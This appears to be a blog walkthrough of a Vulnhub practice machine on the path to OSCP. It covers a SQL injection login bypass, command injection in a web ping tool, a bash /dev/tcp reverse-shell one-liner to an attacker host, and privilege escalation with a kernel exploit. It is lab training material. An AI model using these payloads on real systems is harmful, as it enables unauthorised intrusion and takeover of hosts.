Vulnhub virtual machine; On the path to OSCP this box offered SQL-injection for login and a client side web application that was able to be manipulated to give a foothold to box. Classic enumeration of box to compile a priv-esc.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Enumeration
Find target on network
1 |
|
Target: 192.168.56.104
Nmap Scan
1 |
|
searchsploit search
1 |
|
DoS is not useful in this scenario.
Navigate to webpage
Test for SQL injection
username: admin' OR '1=1--
Successful injection! We are now face with some sort of client side PING tester.
Testing a ping for localhost
Looks like we have successful command execution on box.
Remote Code Execution
Attempt to grab the passwd file by submitting:
1 |
|
Whoami
1 |
|
we are ‘apache’.
Reverse Shell
Setup Listener on port 9000
1 |
|
Attempt to setup a reverse connection with an easy one liner
/bin/bash -i >& /dev/tcp/[ip_address]/[port] 0>&1
how it works:
*bash -i>&*
: invoke bash with an interactive option
*/dev/tcp/[localhost]/9000*
: redirect the session with the /dev/tcp device file
*0>&1*
: use the standard output and redirect it to the standard input
connection established to box and we are ‘apache’.
Upgrade Half Shell to Full Shell Test for which python
1 |
|
Priv-Escalation
Investigate the environment
Running CentOS release 4.5 and Linux 2.6.9-55
check searchsploit for vulnerabilties:
1 |
|
Interesting hit with Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10)
Mirror exploit to directory
1 |
|
Investigate/search for any random shell code and replace if needed.
Get file over to target box with a SimpleHTTPServer
1 |
|
Save file to memory of box as a good habit located at: /dev/shm
Compile on box:
1 |
|
Change the chmod of the file chmod 755 exploit
Root
Execute exploit
1 |
|
Bring me the root!
-exec